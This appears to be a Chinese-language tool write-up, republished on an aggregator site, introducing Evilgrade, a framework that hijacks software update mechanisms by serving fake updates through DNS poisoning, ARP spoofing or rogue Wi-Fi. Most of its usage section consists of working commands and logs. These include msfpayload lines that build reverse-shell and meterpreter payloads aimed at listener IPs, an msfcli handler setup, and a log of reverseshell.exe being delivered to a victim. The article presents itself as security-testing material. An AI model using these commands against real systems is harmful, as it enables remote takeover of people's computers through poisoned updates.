服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

如何使用Evilgrade测试应用程序的升级机制是否安全

日期: 来源:FreeBuf收集编辑:Alpha_h4ck


 关于Evilgrade 


Evilgrade是一款功能强大的模块化框架,该框架允许广大研究人员通过向目标应用程序注入伪造的更新代码,并利用存在安全问题的更新实现机制来测试目标升级更新功能的安全性。该工具提供了预构建的代理以及支持快速测试的默认工作配置。除此之外,该工具还拥有自己的WebServer和DNSServer模块。


 工具使用场景 


内部场景

1、内部DNS访问;

2、ARP欺骗;

3、DNS缓存投毒;

4、DHCP欺骗;

5、TCP劫持;

6、Wi-Fi访问点伪造;


外部场景

1、内部DNS访问;

2、DNS缓存投毒;


实现的模块

Freerip 3.30

Jet photo 4.7.2

Teamviewer 5.1.9385

ISOpen 4.5.0

Istat.

Gom 2.1.25.5015

Atube catcher 1.0.300

Vidbox 7.5

Ccleaner 2.30.1130

Fcleaner 1.2.9.409

Allmynotes 1.26

Notepad++ 5.8.2

Java 1.6.0_22 winxp/win7

aMSN 0.98.3

Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)

Mirc 7.14

Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702)

Dap 9.5.0.3

Winscp 4.2.9

AutoIt Script 3.3.6.1

Clamwin 0.96.0.1

AppTapp Installer 3.11 (Iphone/Itunes)

getjar (facebook.com)

Google Analytics Javascript injection

Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8

Winamp 5.581

TechTracker (cnet) 1.3.1 (Build 55)

Nokiasoftware firmware update 2.4.8es

Nokia firmware v20.2.011

BSplayer 2.53.1034

Apt ( < Ubuntu 10.04 LTS)

Ubertwitter 4.6 (0.971)

Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45

Cpan 1.9402

VirtualBox (3.2.8 )

Express talk

Filezilla

Flashget

Miranda

Orbit

Photoscape.

Panda Antirootkit

Skype

Sunbelt

Superantispyware

Trillian <= 5.0.0.26

Adium 1.3.10 (Sparkle Framework)

VMware

...


 工具下载 


广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/infobyte/evilgrade.git

(向右滑动,查看更多)


 工具使用 


下面给出的是工具的帮助信息:

evilgrade>helpType 'help command' for more detailed help on a command.  Commands:    configure -  配置模块名称    exit      -  退出程序    help      -  输出工具帮助信息    reload    -  重新加载并更新所有模块    restart   -   重启Web服务器    set       -  配置变量    show      - 显示对象信息    start     -  开启Web服务器    status    -  获取Web服务器窗台    stop      -  停止Web服务器    version   -  显示框架版本  Object:     options  -  显示当前模块的选项     vhosts   -  显示当前模块的VirtualHosts     modules  -  列举所有可用的模块     active   -  显示活动模块

(向右滑动,查看更多)

列举实现的模块:

evilgrade>show modulesList of modules:===============.........- 63 modules available.


配置指定模块:

evilgrade>conf sunjavaevilgrade(sunjava)>

开启服务(DNS服务器和WebServer):

evilgrade>startevilgrade>[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...evilgrade>[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...#### Waiting for victimsevilgrade>[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"evilgrade>[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"evilgrade>[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"evilgrade>[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

(向右滑动,查看更多)


显示状态和日志:

evilgrade>show statusWebserver (pid 4134) already runningUsers status:============.---------------------------------------------------------------------------------------------------------------.| Client         | Module           | Status | Md5,Cmd,File                                                     |+----------------+------------------+--------+------------------------------------------------------------------+| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |'----------------+------------------+--------+------------------------------------------------------------------'

(向右滑动,查看更多)


 工具高级使用 


使用场景一


evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

(向右滑动,查看更多)


在这种情况下,对于每个所需的更新二进制文件,我们都可以使用 "windows/shell_reverse_tcp"这个Payload来生成伪造的更新代码,同时使用一个反向Shell连接到192.168.233.2:4141。<%OUT%><%OUT>标签专门来检测输出二进制文件的生成位置。


比如说,如果我们运行下列命令:

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

(向右滑动,查看更多)

那么每当我们收到一个二进制请求时,Evilgrade将编译该行并执行最终字符串"./generatebin -o /tmp/update(random).exe",然后生成不同的代理。


使用场景二


在Evilgrade外运行:

[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe

(向右滑动,查看更多)


在Evilgrade内运行:

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

(向右滑动,查看更多)


生成好Payload之后,我们将得到多个处理器Handler来监听之前分配的LHOST:

[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E[*] Started reverse handler on 192.168.100.2:4444[*] Starting the payload handler...

(向右滑动,查看更多)


 项目地址 


Evilgrade

https://github.com/infobyte/evilgrade


参考资料:

http://www.faradaysec.com/

精彩推荐







相关阅读

  • 供需两端发力 货币政策工具在新疆落地生效

  • 天山网讯(记者 冉虎报道)记者从中国人民银行乌鲁木齐中心支行获悉:今年中国人民银行总行对多项货币政策工具作出延续实施安排,我区将从供需两端同时发力,推动各项货币政策工具在
  • 从社会文化理论视角“调节”基础英语教学

  • 社会文化理论源于L. S. Vygotsky在20世纪30年代提出的文化历史发展理论,随后得到心理学、语言学和教育学等学科的支持与发展。20世纪90年代末,美国语言学家J. P. Lantolf将社
  • Win11的独家功能,终于被Win10工具破解了!

  • 众所周知,安卓各种有意思的App多到手机都装不下,但这些App也仅限于安卓机使用,那么如何才能在电脑上愉快的使用安卓App呢?可能你想说用虚拟机、模拟器就能轻松搞定。我承认你说
  • 究竟用什么来定义有趣的设计?

  • 设计不仅可以解决实际问题,为我们带来便利,那些有趣的设计还能为日常生活增添色彩和趣味,带来愉悦的情绪。本期THE PLUS PAPER为大家介绍一些有趣的设计,看看设计师们是如何让生
  • 大数据导航:近4000多款数据工具

  • 大数据导航目前上线近4000多款数据工具,,本站是您工作好帮手,欢迎大家收藏并分享更多的人。点击阅读原文,即可访问大数据导航
  • 【经典作图题】这些细节拿捏住,再涨10分!

  • 点击蓝字|关注我们哈喽大家好,我是苏苏,最近有一件大事,打印准考证,大家一定要记得哦,还有记得多打印几份备用,今天来说说考前作图题注意事项以及典型图讲解-螺纹连接+V带+轴系改
  • 我关注的周刊

  • 貌似现在很多人都在写周刊了,我也陆陆续续关注了一些,大多数和设计、前端相关。今天推荐一些我每周都会看的给大家,然后再推荐一下我自己在写的一个周刊(没想到吧)。DEX 周刊DEX

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 重大供应链威胁!这个 Java 开源框架存在严重漏洞

  • 美国网络安全和基础设施安全局(CISA)的安全研究人员报告称,一个受广泛使用的开源Java框架中存在严重漏洞并被攻击者利用,以向未打补丁的服务器部署后门。专家表示,这种情况可能会
  • Lazarus 组织开始在攻击中应用反取证技术

  • 大约一年前开始,在韩国国防、卫星、软件和媒体出版等多个行业的公司中都发现了 Lazarus 组织的身影。本文旨在通过 Lazarus 组织入侵的组织,总结该犯罪团伙所使用的反取证技术
  • 注意!高级威胁组织APT-C-36正在活跃

  • 近日,据黑莓安全研究与威胁情报团队称,名为Blind Eagle 的APT组织正在活跃,针对哥伦比亚各个关键行业发起持续性网络攻击,包括卫生、金融、执法、移民以及负责哥伦比亚和平谈判